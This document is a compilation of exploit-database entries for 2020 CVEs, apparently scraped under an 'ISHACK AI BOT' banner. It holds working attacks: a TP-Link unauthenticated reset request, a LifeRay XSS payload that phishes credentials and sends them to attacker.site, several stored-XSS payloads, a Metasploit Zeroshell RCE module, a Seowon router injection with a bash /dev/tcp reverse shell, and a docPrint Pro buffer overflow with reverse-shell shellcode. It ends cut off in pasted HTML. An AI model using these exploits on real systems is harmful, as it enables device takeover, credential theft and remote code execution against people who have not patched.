ISHACK AI BOT

# Exploit Title: TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass # Date: 2020/07/29 # Exploit Author: malwrforensics # Vendor Homepage: https://tp-link.com # Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855RE_V5_200415.zip # Version: TL-WA855RE(US)_V5_200415 # Tested on: N/A # CVE : 2020-24363 Important: The vendor has released a fix; the new firmware (TL-WA855RE(US)_V5_200731) is available to download from: https://www.tp-link.com/us/support/download/tl-wa855re/v5/#Firmware Details By default the web interface of the TL-WA855RE wireless extender require users to log in in order to access the admin interface. However, an attacker, on the same network, can bypass it and use the APIs provided to reset the device to its factory settings by using the TDDP_RESET code. An attacker can then set up a new admin password, resulting in a complete takeover of the device. To test, you can send a POST request like the one below using the TDDP_RESET (5). The request doesn't need any type of authentication. You can then access the web interface and set a new administrative password. POST /?code=5&asyn=0 HTTP/1.1 Host: <redacted> Content-Length: 7 Accept: text/plain, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 Content-Type: text/plain;charset=UTF-8 Origin: http://<redacted> Referer: http://<redacted> Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close 0|1,0,0

# Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS # Date: 10/05/2020 # Exploit Author: 3ndG4me # Vendor Homepage: https://www.liferay.com/ # Software Link: https://www.liferay.com/ # Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED) # Tested on: Debian Linux # CVE : CVE-2020-7934 # Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 # NOTE: The attached proof of concept is a javascript payload, submitted as a ".txt" file to attach via email as ".js" is often blocked. // CVE-2020-7934 Cred Phishing Example Attack // Author: 3ndG4me // Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 // Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant: // <SCRIPT SRC="//attacker.site/cve-2020-7934.js"> var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", ""); var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", ""); console.log(email); console.log(password); var url = "http://attacker.site/" + email + ":" + password; $.get(url);

# Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting # Date: 24-11-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://www.nopcommerce.com/ # Version: 4.30 # Tested on: Windows 10/Kali Linux # CVE: CVE-2020-29475 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Attack vector: This vulnerability can results attacker to inject the XSS payload in Schedule tasks and each time any user will go to that page of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Schedule tasks. Steps-To-Reproduce: 1. Go to the nopCommerce Store admin page. 2. Now go to the System-Schedule tasks option. 3. Now click to on edit button on any task. 4. Put the below payload in Schedule tasks: "hemantsolo"><img src=x onerror=confirm(1)>" 5. Now click on Update button. 6. The XSS will be triggered. POST /Admin/ScheduleTask/TaskUpdate HTTP/1.1 Host: 127.0.0.1 Connection: close Content-Length: 335 Accept: application/json, text/javascript, */*; q=0.01 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: 127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: 127.0.0.1/Admin/ScheduleTask/List Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 Cookie: xyz Id=5&Name=hemantsolo%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm(1)%3E&Seconds=3600&Enabled=false&StopOnError=false&__RequestVerificationToken=CfDJ8Hstb5ORl7RLtnBnyhE10fENmFHuOPhDq-cN_XNT5gs_nUq2ht5UeggYY9Fea9OqSCeJnVy_e4IKpQ7HhLYwtOMRS76BYcfJ9Os-CI9BxTxrumbAaunwIxrDMZm6CbNRs9EPzKQabez4H7dNpXG6oVpiC5Pc__xQVm06bp4c4O_D15lqehkk6EmqDAizfm8LFA

# Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service # Google Dork: "Apache OpenMeetings DOS" # Date: 2020-08-28 # Exploit Author: SunCSR (ThienNV - Sun* Cyber Security Research) # Vendor Homepage: https://openmeetings.apache.org/ # Software Link: https://openmeetings.apache.org/ # Version: 4.0.0 - 5.0.0 # Tested on: Windows # CVE: CVE-2020-13951 - POC: # Vulnerability variable: hostname # Payload: x.x.x.x;ls # Request exploit: GET /openmeetings/wicket/bookmarkable/org.apache.openmeetings.web.pages.HashPage?3-1.0-panel~main&app=network&navigatorAppName=Netscape&navigatorAppVersion=5.0 (Windows)&navigatorAppCodeName=Mozilla&navigatorCookieEnabled=true&navigatorJavaEnabled=false&navigatorLanguage=en-US&navigatorPlatform=Win32&navigatorUserAgent=Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0&screenWidth=1920&screenHeight=1080&screenColorDepth=24&jsTimeZone=Asia/Ho_Chi_Minh&utcOffset=7&utcDSTOffset=7&browserWidth=1920&browserHeight=966&hostname=x.x.x.x;ls&codebase=https://x.x.x.x:5443/openmeetings/hash&settings=[object Object]&_=1597801817026 - Reference: https://lists.apache.org/thread.html/re2aed827cd24ae73cbc320e5808020c8d12c7b687ee861b27d728bbc%40%3Cuser.openmeetings.apache.org%3E https://nvd.nist.gov/vuln/detail/CVE-2020-13951

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Zeroshell 3.9.0 Remote Command Execution', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability found in ZeroShell 3.9.0 in the "/cgi-bin/kerbynet" url. As sudo is configured to execute /bin/tar without a password (NOPASSWD) it is possible to run root commands using the "checkpoint" tar options. }, 'Author' => [ 'Juan Manuel Fernandez', # Vulnerability discovery 'Giuseppe Fuggiano <giuseppe[dot]fuggiano[at]gmail.com>', # Metasploit module ], 'References' => [ ['CVE', '2019-12725'], ['URL', 'https://www.tarlogic.com/advisories/zeroshell-rce-root.txt'], ['URL', 'https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py'] ], 'DisclosureDate' => 'Jul 17 2019', 'License' => MSF_LICENSE, 'Privileged' => true, 'Platform' => [ 'unix', 'linux' ], 'Arch' => [ ARCH_X86 ], 'Targets' => [ ['Zeroshell 3.9.0 (x86)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, }], ], 'DefaultTarget' => 0, )) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), ]) end def execute_command(cmd, opts = {}) command_payload = "%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22#{filter_bad_chars(cmd)}%22%0A%27" print_status("Sending stager payload...") res = send_request_cgi( 'method' => 'GET', 'uri' => '/cgi-bin/kerbynet', 'encode_params' => false, 'vars_get' => { 'Action' => 'x509view', 'Section' => 'NoAuthREQ', 'User' => '', 'x509type' => command_payload } ) return res end def filter_bad_chars(cmd) cmd.gsub!(/chmod \+x/, 'chmod 777') cmd.gsub!(/;/, " %0A ") cmd.gsub!(/ /, '+') cmd.gsub!(/\//, '%2F') return cmd end def check res = execute_command('id') if res && res.body.include?("uid=0(root)") Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit print_status("Exploiting...") execute_cmdstager(flavor: :wget, delay: 5) end end

# Exploit Title: Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated) # Date: 5 Aug 2020 # Exploit Author: maj0rmil4d # Vendor Homepage: http://www.seowonintech.co.kr/en/ # Hardware Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29 # Version: 1.0.11 (Possibly all versions) The default user/pass is admin/admin your commands run as root user the vulnerablity is on the ipAddr parameter in system_log.cgi Usage: login to the dashboard. setup your listener. download the revshell.txt with the RCE run the revshell.txt * here is the RCE request : POST /cgi-bin/system_log.cgi? HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201= 00101 Firefox/79.0 Accept: */* Accept-Language: en-US,en;q0.5 Accept-Encoding: gzip, deflate Content-type: application/x-www-form-urlencoded Content-Length: 183 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/diagnostic.html?t201802140812 Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; = connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen= ; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna= ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; = cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan= Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408= 4662; cpe_loginadmin; _lang CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56= &pingTimeout30&pingCount4&ipAddr;id&maxTTLCnt30&queriesCnt3&= reportIpOnlyCheckboxon&btnApplyApply&T1596644096617 * to get a reverse shell, setup the listener and download the file on the r= outer then run it . * the content of the revshell.txt : bash -i >& /dev/tcp/192.168.1.10/45214 0>&1 * to download : POST /cgi-bin/system_log.cgi? HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201= 00101 Firefox/79.0 Accept: */* Accept-Language: en-US,en;q0.5 Accept-Encoding: gzip, deflate Content-type: application/x-www-form-urlencoded Content-Length: 183 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/diagnostic.html?t201802140812 Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; = connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen= ; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna= ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; = cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan= Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408= 4662; cpe_loginadmin; _lang CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56= &pingTimeout30&pingCount4&ipAddr;wget http://192.168.1.10/revshell= .txt&maxTTLCnt30&queriesCnt3&reportIpOnlyCheckboxon&btnApplyApp= ly&T1596644096617 * to run it : POST /cgi-bin/system_log.cgi? HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201= 00101 Firefox/79.0 Accept: */* Accept-Language: en-US,en;q0.5 Accept-Encoding: gzip, deflate Content-type: application/x-www-form-urlencoded Content-Length: 183 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/diagnostic.html?t201802140812 Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; = connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen= ; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna= ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; = cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan= Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408= 4662; cpe_loginadmin; _lang CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56= &pingTimeout30&pingCount4&ipAddr;bash revshell.txt&maxTTLCnt30&= queriesCnt3&reportIpOnlyCheckboxon&btnApplyApply&T1596644096617

# Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting # Date: 24-11-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=cms/download # Version: 3.0.3.6 # Tested on: Windows 10/Kali Linux # CVE: CVE-2020-29470 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Attack vector: This vulnerability can results attacker to inject the XSS payload in Subject field of the mail and each time any user will open that mail of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Subject of mail. Steps-To-Reproduce: 1. Go to the opencart admin page. 2. Now go to the Marketing-Mail option. 3. Put the below payload in subject field of the Mail : "<script>alert(123)</script>" 5. Now click on send button. 6. The XSS will be triggered. POST /admin/index.php?route=marketing/contact/send&user_token=hYt4UTixry8NDaXiuhXO5mzuahIcOIO5 HTTP/1.1 Host: localhost Connection: close Content-Length: 206 Accept: application/json, text/javascript, */*; q=0.01 DNT: 1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: localhost/admin/index.php?route=marketing/contact&user_token=hYt4UTixry8NDaXiuhXO5mzuahIcOIO5 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 Cookie: __cfduid=d6a6bab42bd30fb2b2e20cad3dd5a80ed1606187757; store_id=0&to=newsletter&customer_group_id=1&customers=&affiliates=&products=&subject=hemantsolo%22%2F%3E%3Cscript%3Ealert(123)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self

# Exploit Title: OpenCart 3.0.3.6 - 'Profile Image' Stored Cross Site Scripting (Authenticated) # Date: 24-11-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=cms/download # Version: 3.0.3.6 # Tested on: Windows 10/Kali Linux # CVE: CVE-2020-29471 Vulnerable Parameters: Profile Image. Steps-To-Reproduce: 1. Go to the opencart admin page. 2. Now go to the profile page. * Before the next step write this in notepad ""><svg onload=alert("XSS")>" and save it as an payload.png 3. Now edit the image and uplaod the image as payload.png. 4. The XSS will be triggered.

# Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter) # Date: 2020-07-26 # Exploit Author: MasterVlad # Vendor Homepage: http://www.verypdf.com # Software Link: http://dl.verypdf.net/docprint_pro_setup.exe # Version: 8.0 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 32-bit # Proof of Concept: # 1. Run the python script # 2. Open exploit.txt and copy the content to clipboard # 3. Open doc2pdf_win.exe and go to File -> Add URL # 4. Paste the clipboard into the field and click on Ok #!/usr/bin/python # encoded egghunter egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A" egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI buf = "" buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63" buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b" buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70" buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37" buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53" buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f" buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66" buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c" buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56" buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71" buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50" buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61" buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f" buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d" buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43" buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46" buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35" buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50" buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33" buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f" buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31" buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68" buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42" buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38" buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70" buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70" buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43" buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f" buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56" buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48" buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30" buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45" buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44" buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c" buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58" buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39" buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50" buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46" buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c" buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64" buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42" buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58" buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d" buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50" buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b" buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58" buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55" buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50" buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70" buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41" exploit = "A"*3876 exploit += "\x74\x06\x75\x04" # 0x1001062d - pop pop ret - reg.dll exploit += "\x2d\x06\x01\x10" exploit += egg exploit += "D"*(10000-3884-len(egg)-len(buf)-8) exploit += "T00WT00W" exploit += buf f = open("exploit.txt", "w") f.write(exploit) f.close()

# Exploit Title: WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting # Date: 20-11-2020 # Exploit Author: Mayur Parmar # Vendor Homepage: https://www.wondercms.com/ # Version: 3.1.3 # Tested on: PopOS Stored Cross-site scripting(XSS): Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent XSS. Attack vector: This vulnerability can results attacker to inject the XSS payload in Page keywords and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Page Title. Steps-To-Reproduce: 1. Go to the Simple website builder. 2. Put this payload in Page keywords: Mayur"><img src=x onerror=confirm("XSS")> 3. Now go to the website and the XSS will be triggered.

# Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path # Date: 2020-11-24 # Exploit Author: Luis Sandoval # Vendor Homepage: https://www.wondershare.com/ # Software Link: https://www.wondershare.com/drfone/ # Version: 10.7.1.321 # Tested on: Windows 10 Home Single Language x64 Esp # Service info: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe Auto C:\Users\user>sc qc ElevationService [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ElevationService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Wondershare Driver Install Service help DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting # Date: 2020-11-19 # Exploit Author: Emre Aslan # Vendor Homepage: https://www.oscommerce.com/ # Version: 2.3.4.1 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Login to admin panel. 2- Go to the following url. ==> http(s)://(HOST)/catalog/admin/newsletters.php?action=new 3- Enter the XSS payload into the title section and save it. ==> Vulnerable Parameter <== title= (post parameter) ==> HTTP Request <== POST /catalog/admin/newsletters.php?action=insert HTTP/1.1 Host: (HOST) Connection: keep-alive Content-Length: 123 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://(HOST)/ Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://(HOST)/catalog/admin/newsletters.php?action=new Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: osCAdminID=s11ou44m0vrasducn78c6sg module=newsletter&title="><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img>&content=xss ==> Vulnerable Source Code <== <div id="contentText"> <table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td class="pageHeading">Newsletter Manager</td> <td class="pageHeading" align="right"><img src="images/pixel_trans.gif" border="0" alt="" width="57" height="40" /></td> </tr> </table></td> </tr> <tr> <td><table border="0" width="100%" cellspacing="0" cellpadding="0"> <tr> <td valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr class="dataTableHeadingRow"> <td class="dataTableHeadingContent">Newsletters</td> <td class="dataTableHeadingContent" align="right">Size</td> <td class="dataTableHeadingContent" align="right">Module</td> <td class="dataTableHeadingContent" align="center">Sent</td> <td class="dataTableHeadingContent" align="center">Status</td> <td class="dataTableHeadingContent" align="right">Action&nbsp;</td> </tr> <tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview'"> <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbsp;"><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></td> <td class="dataTableContent" align="right">3 bytes</td> <td class="dataTableContent" align="right">newsletter</td> <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td> <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td> <td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="" />&nbsp;</td> </tr> <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1'"> <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbsp;"><img src=1 href=1 onerror="javascript:alert(1)"></img></td> <td class="dataTableContent" align="right">7 bytes</td> <td class="dataTableContent" align="right">newsletter</td> <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td> <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td> <td class="dataTableContent" align="right"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1"><img src="images/icon_info.gif" border="0" alt="Info" title="Info" /></a>&nbsp;</td> </tr> <tr> <td colspan="6"><table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr> <td class="smallText" valign="top">Displaying <strong>1</strong> to <strong>2</strong> (of <strong>2</strong> newsletters)</td> <td class="smallText" align="right">Page 1 of 1</td> </tr> <tr> <td class="smallText" align="right" colspan="2"><span class="tdbLink"><a id="tdb1" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?action=new">New Newsletter</a></span><script type="text/javascript">$("#tdb1").button({icons:{primary:"ui-icon-plus"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td> </tr> </table></td> </tr> </table></td> <td width="25%" valign="top"> <table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr class="infoBoxHeading"> <td class="infoBoxHeading"><strong>"><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></strong></td> </tr> </table> <table border="0" width="100%" cellspacing="0" cellpadding="2"> <tr> <td align="center" class="infoBoxContent"><span class="tdbLink"><a id="tdb2" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview">Preview</a></span><script 